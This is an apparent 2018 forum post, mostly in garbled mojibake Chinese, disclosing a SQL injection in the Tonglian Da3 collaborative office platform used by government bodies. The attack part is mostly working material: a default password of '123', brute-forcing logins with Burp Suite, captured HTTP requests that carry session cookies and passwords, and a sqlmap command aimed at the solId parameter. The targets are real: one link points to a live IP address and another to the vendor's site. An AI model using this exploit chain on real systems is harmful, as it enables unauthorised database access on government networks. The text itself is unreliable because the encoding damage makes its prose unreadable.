Í¬ÁªDa3ÐÍ¬°ì¹«Æ½Ì¨Ç°Ì¨Í¨ÓÃsql injectionÂ©¶´

admin ·¢±íÓÚ 2018-10-20 20:15:17

Æ½Ì¨¼ò½é£º


 


±±¾©Í¬ÁªÐÅÏ¢¼¼ÊõÓÐÏÞ¹«Ë¾£¨ÒÔÏÂ¼ò³ÆÍ¬Áª£©ÓÉÓÃÓÑÕþÎñÓëÓÃÓÑÔÐÐÒµÊÂÒµ²¿ÍÅ¶ÓºÏ»ï³ö×Ê³ÉÁ¢¡£Í¬ÁªÒÔ¡°ÎªÈ«¹ú¸÷¼¶Õþ¸®µ¥Î»Ìá¹©ÐÅÏ¢»¯×ÉÑ¯¹æ»®¡¢½¨Éè½â¾ö·½°¸ºÍÐÅÏ¢»¯ÔËÎ¬·þÎñ£¬ÒÔ¼ÓÇ¿¸÷¼¶Õþ¸®µÄ¾«Ï¸»¯¡¢ÖÇÄÜ»¯¹ÜÀí£¬ÐÎ³É¸ßÐ§¡¢Ãô½Ý¡¢±ãÃñµÄÐÂÐÍÕþ¸®¡£¡±ÎªÊ¹Ãü£¬ÖÂÁ¦ÓÚÎª¸÷¼¶Õþ¸®µ¥Î»Ìá¹©×¨Òµ¡¢±ê×¼¡¢Áé»î¡¢Ò×ÓÃµÄÐÅÏ¢»¯²úÆ·¼°×¨ÒµµÄ·þÎñ¡£ 
Í¬ÁªÃæÏòÕþ¸®µ¥Î»Ìá¹©×¨Òµ¡¢±ê×¼¡¢Áé»î¡¢Ò×ÓÃµÄÐÅÏ¢»¯²úÆ·¡£Õë¶Ô¸÷¼¶Õþ¸®µ¥Î»£¬·Ö±ðÌá¹©ÒÔ¡°ÒÆ¶¯ÕþÎñ°ì¹«¡±ÎªÖ÷µÄDa3ÏµÁÐ¹ÜÀíÈí¼þ£»Õë¶ÔÕþ·¨µ¥Î»Ìá¹©ÒÔ¡°ÐÍ¬°ì°¸¡±ÎªºËÐÄµÄÕþ·¨ÐÍ¬°ì°¸ÏµÍ³µÈ¡£ 
Í¬Áª±¾×Å¡°Ð×÷¡¢×¨Òµ¡¢´´ÐÂ¡±µÄ¹¤×÷·½Õë£¬ÎªÍÆ¶¯¸÷¼¶Õþ¸®µ¥Î»ÐÅÏ¢»¯¡¢´Ù½ø¸÷¼¶Õþ¸®¿ìËÙ×ªÐÍÎª ¡°ÖÇ»ÛÐÍÕþ¸®¡±×ö³ö»ý¼«¹±Ï×£¡


 


ÓÉÓÚ´Ë³ÌÐòÎªÐÂ¿ª·¢µÄ³ÌÐò£¬¹ÊÄÜÕÒµ½µÄ°¸Àý²¢²»¶à£¬ÏÂÃæ¸½°¸ÀýµØÖ·£º


 


<a href="http://59.48.248.2:7197/cap-aco/#">http://1.1.1.1:7197/cap-aco/#</a>£¨°¸Àý2-£©


<a href="http://www.itonglian.com">http://www.XXOO.com</a> £¨°¸Àý1-¹ÙÍøÍøÕ¾£©


 


Â©¶´ÏêÇé:


 ³õ²½È·¶¨Æ½Ì¨µÄÄ¬ÈÏÕËºÅÎªÐÕÃûµÄÊ××ÖÄ¸Ð¡Ð´£¬³õÊ¼ÃÜÂëÎª123£¬ÎªÁËÄÜ¹»¸üºÃµÄÄ£ÄâÈëÇÖ£¬Ê¹ÓÃºÚºÐ²âÊÔÊÖ¶Î½øÐÐ²âÊÔ


     Ê×ÏÈÊ¹ÓÃburpsuite´úÀí£¬È»ºóÔÙÓÃºÚ¿Í×ÖµäÉú³ÉÒ»¸öÈ«Ó¢ÎÄÐ¡Ð´µÄ3Î»×Öµä£¬ÀûÓÃburpsuite½øÐÐ±©Á¦ÆÆ½â£¬ÆÆ½â½á¹ûÈçÍ¼£º


 


<img width="626" height="356" src="https://www.2k8.org/content/uploadfile/201809/23/96a4a00bfd2c4f359bca24c6bc6b3cd3.jpg" /> 


statusÎª302¼´±íÊ¾ÆÆ½â³É¹¦£¬È»ºóÕÒ¸öÆÆ½â³É¹¦µÄÕËºÅµÇÂ¼ÏµÍ³¡£¾¹ý³¤Ê±¼äµÄÊÖ¹¤²âÊÔ·¢ÏÖÔÚ·¢ÎÄ¹ÜÀíÄ£¿é×¥°ü£¬×¥°üµÄÊý¾Ý·Ö±ðÈçÏÂ£º


1¡¢°¸Àý1-¹Ù·½ÍøÕ¾


GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1


Host: www.XXOO.com


Proxy-Connection: Keep-Alive


Accept: application/json, text/javascript, */*; q=0.01


Accept-Language: zh-CN


Content-Type: application/json


User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko


X-Requested-With: XMLHttpRequest


Referer: http://www.XXOO.com/bizRunController/getBizRunList/42b0234e-d5dc-402d-9cef-1ce38cbae480?modCode=1008M002


Accept-Encoding: gzip, deflate, sdch


Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e


½«ÉÏÃæpostÊý¾Ý°ü¸´ÖÆµ½txtÎÄ±¾Àï±£´æÎªtl.txt²¢½«Æä·Åµ½sqlmap¸ùÄ¿Â¼ÏÂÀûÓÃsqlmap×¢ÈëÃüÁîÎª£ºsqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba ×¢ÈëÈçÍ¼:


<img width="554" height="338" src="https://www.2k8.org/content/uploadfile/201809/23/94aeb9acd0da4e889957791d97dc8bf0.jpg" /> 


<img width="554" height="359" src="https://www.2k8.org/content/uploadfile/201809/23/e79e1bc3374f49389c7844278d9d9dc0.jpg" /> 


 


 


 


2¡¢°¸Àý2-Ä³ÌìºÓÔÆÆ½Ì¨


GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1


Host: 1.1.1.:7197


Accept: application/json, text/javascript, */*; q=0.01


X-Requested-With: XMLHttpRequest


User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0


Content-Type: application/json


Referer: http://1.1.1.1:7197/cap-aco/bizRunController/getBizRunList/af056885-4ae5-4e0b-8a0d-c413a786f2db?modCode=1008


Accept-Language: zh-CN,zh;q=0.8


Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1


Connection: close


½«ÉÏÃæpostÊý¾Ý°ü¸´ÖÆµ½txtÎÄ±¾Àï±£´æÎªtl.txt²¢½«Æä·Åµ½sqlmap¸ùÄ¿Â¼ÏÂÀûÓÃsqlmap×¢ÈëÃüÁîÎª£ºsqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba ×¢ÈëÈçÍ¼:


 <img src="https://www.2k8.org/content/uploadfile/201809/23/47eb19e64a9641a584e4a40d829e0c69.jpg" />

Ò³: [1]

ÖÐ¹úÍøÂçÉøÍ¸²âÊÔÁªÃË's Archiver

Í¬ÁªDa3Ð­Í¬°ì¹«Æ½Ì¨Ç°Ì¨Í¨ÓÃsql injectionÂ©¶´

Í¬ÁªDa3ÐÍ¬°ì¹«Æ½Ì¨Ç°Ì¨Í¨ÓÃsql injectionÂ©¶´